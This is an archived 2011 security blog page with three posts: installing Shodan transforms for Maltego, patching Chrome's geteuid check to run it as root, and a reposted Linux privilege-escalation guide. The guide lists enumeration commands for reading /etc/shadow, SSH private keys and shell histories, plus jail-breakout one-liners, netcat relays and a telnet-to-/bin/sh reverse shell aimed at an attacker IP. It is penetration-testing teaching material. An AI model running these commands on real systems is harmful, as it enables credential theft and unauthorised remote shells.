Friday, October 28, 2011

Shodan: Maltego Add-on



The Maltego add-ons for Shodan have 2 parts: entities and transforms. Entities are used to display
information in a sensible way in Maltego, while transforms let you modify and manipulate the

To get started, we will first import the new entities that Shodan provides for Maltego.


  1. Download the entities at:
  2. In Maltego, select "Manage Entities" in the "Manage" tab.
  3. Select "Import..."
  4. Locate the "entities.mtz" file you just downloaded and click "Next".
  5. Make sure all entities are checked, and click "Next".
  6. Enter "Shodan" as a category for the new entities. Click "Finish".
If you don't yet see the new entities in your Palette on the left side, right-click on the area and select
"Refresh Palette". You should now see a new category called "Shodan" with several new entities listed there.


  1. Select "Discover Transforms" in the "Manage" tab.
  2. In the "Name" field, enter "Shodan"
  3. As a URL, use:
  4. Click "Add"
  5. Make sure the "Shodan" seed is selected, then click "Next"
  6. Again make sure you see "Shodan" selected, then click "Next"
  7. You now see a list of transforms that the "Shodan" seed has. Just click "Next" :)
  8. Click "Finish".
Alright, that's it for the installation! If you encounter any problems during this process,
just send an email or a message via Twitter.


There are 6 transforms available currently:
  • searchShodan
  • searchExploitDB
  • searchMetasploit
  • getHostProfile
  • searchShodanDomain
  • searchShodanNetblock
The first 3 transforms (searchShodan, searchExploitDB and searchMetasploit) take a "Phrase" as input, and return a set of "IPv4 Address", "ExploitDB Entry" and "MSF Module" entities. Then you can get more detailed information about an "IPv4 Address" by using the getHostProfile transform on it. The latter returns a list of "Banner" entities, "Domain"s and a "Location" entity (if available).

Thursday, October 27, 2011

How to Run Google Chrome as Root on Backtrack Linux

1. Close out any instances of google chrome.

2. Open a terminal and change into the google chrome directory

root@bt:~# cd /opt/google/chrome/

3. Next we are going to use a Hex editor to modify the Chrome code. We are basically going to alter the section that checks to see what user is running.

root@bt:/opt/google/chrome# hexedit chrome

4. Now you will be presented with the following screen:

5. The first thing we need to do is press the tab key which will switch us into ASCII mode. You can see if this worked because your cursor will move over to the right hand column of the hex editor.
6. Next we will hit CTRL-s in order to open up the search function. The string we are looking for is the “geteuid” command.
7. Once we locate the string what we want to do is alter it from “geteuid” to “geteppd”
8. Once the ASCII string is altered we can press CTRL-x in order to save the file. Be sure to reply Yes when asked if you want to save the file or not.

9. Once the file is saved we can open Google Chrome and it should run normally.

news from thanks to pureh@te

Monday, October 17, 2011

Basic Linux Privilege Escalation from g0tmi1k

 Sorry for not updating this blog due to the busy day at work of my friend keep asking about Linux Privilege Escalation and don't have enough time to explain to him but prepare this for him and to other out there........thanks to the 'gotmi1lk' for his simple and easy way to understand the method

From g0tmi1k.

Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hunt for that "little thing" as "the devil is in the detail".

Enumeration is the key.

(Linux) privilege escalation is all about:

  • Collect - Enumeration, more enumeration and some more enumeration.
  • Process - Sort through data, analyse and prioritisation.
  • Search - Know what to search for and where to find the exploit code.
  • Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box".
  • Try - Get ready for (lots of) trial and error.

Operating System

What's the distribution type? What version?

cat /etc/issue

cat /etc/*-release

   cat /etc/lsb-release

   cat /etc/redhat-release

What's the Kernel version? Is it 64-bit?

cat /proc/version  

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout



Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux

ps -ef


cat /etc/service

Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!

ps aux | grep root

ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archivesO

ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]

grep -i pass [filename]

grep -C 5 "password" [filename]

find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a

cat /etc/network/interfaces

cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf

cat /etc/sysconfig/network

cat /etc/networks

iptables -L



What other users & hosts are communicating with the system?

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on



Whats cached? IP and/or MAC addresses

arp -e


/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

tcpdump tcp dst 80 and tcp dst 21

Have you got a shell? Can you interact with the system?


nc -lvp 4444    # Attacker. Input (Commands)

nc -lvp 4445    # Attacker. Ouput (Results)

telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Is port forwarding possible? Redirect and interact with traffic from another view

# rinetd


# fpipe

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080: root@    # Local Port

ssh -R 8080: root@    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 80 >backpipe    # Port Relay

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely

ssh -D -N [username]@[ip]

proxychains ifconfig

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?





cat /etc/passwd | cut -d:    # List of users

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users

awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users

cat /etc/sudoers

sudo -l

What sensitive files can be found?

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/

ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/

cat /var/lib/mysql/mysql/user.MYD

cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history

cat ~/.nano_history

cat ~/.atftp_history

cat ~/.mysql_history

cat ~/.php_history

What user information can be found?

cat ~/.bashrc

cat ~/.profile

cat /var/mail/root

cat /var/spool/mail/root

Can private-key information be found?

cat ~/.ssh/authorized_keys

cat ~/.ssh/

cat ~/.ssh/identity

cat ~/.ssh/

cat ~/.ssh/id_rsa

cat ~/.ssh/

cat ~/.ssh/id_dsa

cat /etc/ssh/ssh_config

cat /etc/ssh/sshd_config

cat /etc/ssh/

cat /etc/ssh/ssh_host_dsa_key

cat /etc/ssh/

cat /etc/ssh/ssh_host_rsa_key

cat /etc/ssh/

cat /etc/ssh/ssh_host_key

File Systems

Which configuration files can be written in /etc/? Able to reconfigure a service?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone

ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner

ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group

ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone

find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?

ls -alh /var/log

ls -alh /var/mail

ls -alh /var/spool

ls -alh /var/spool/lpd

ls -alh /var/lib/pgsql

ls -alh /var/lib/mysql

cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?

ls -alhR /var/www/

ls -alhR /srv/www/htdocs/

ls -alhR /usr/local/www/apache22/data/

ls -alhR /opt/lampp/htdocs/

ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with "Local File Includes"!)


cat /etc/httpd/logs/access_log

cat /etc/httpd/logs/access.log

cat /etc/httpd/logs/error_log

cat /etc/httpd/logs/error.log

cat /var/log/apache2/access_log

cat /var/log/apache2/access.log

cat /var/log/apache2/error_log

cat /var/log/apache2/error.log

cat /var/log/apache/access_log

cat /var/log/apache/access.log

cat /var/log/auth.log

cat /var/log/chttp.log

cat /var/log/cups/error_log

cat /var/log/dpkg.log

cat /var/log/faillog

cat /var/log/httpd/access_log

cat /var/log/httpd/access.log

cat /var/log/httpd/error_log

cat /var/log/httpd/error.log

cat /var/log/lastlog

cat /var/log/lighttpd/access.log

cat /var/log/lighttpd/error.log

cat /var/log/lighttpd/lighttpd.access.log

cat /var/log/lighttpd/lighttpd.error.log

cat /var/log/messages

cat /var/log/secure

cat /var/log/syslog

cat /var/log/wtmp

cat /var/log/xferlog

cat /var/log/yum.log

cat /var/run/utmp

cat /var/webmin/miniserv.log

cat /var/www/logs/access_log

cat /var/www/logs/access.log

ls -alh /var/lib/dhcp3/

ls -alh /var/log/postgresql/

ls -alh /var/log/proftpd/

ls -alh /var/log/samba/

# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log,, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, you break out of the "jail" shell?

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

/bin/sh -i

How are file-systems mounted?


df -h

Are there any unmounted file-systems?

cat /etc/fstab

What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID

find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here

find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID

for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null        # world-writeable folders

find / -perm -222 -type d 2>/dev/null      # world-writeable folders

find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any "problem" files? Word-writeable, "nobody" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files

find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

Preparation & Finding Exploit Code

What development tools/languages are installed/supported?

find / -name perl*

find / -name python*

find / -name gcc*

find / -name cc

How can files be uploaded?

find / -name wget

find / -name nc*

find / -name netcat*

find / -name tftp*

find / -name ftp

Finding exploit code

Finding more information regarding the exploit[CVE][CVE][CVE]

(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk


Is any of the above information easy to find? 

Try doing it!

Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services

apt-get update && apt-get upgrade

yum update

Are services running with the minimum level of privileges required?

For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!

Other (quick) guides & Links